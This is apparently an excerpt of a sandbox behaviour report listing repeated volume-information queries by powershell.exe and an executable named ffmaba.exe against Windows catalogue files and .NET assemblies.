Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\ffmaba.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
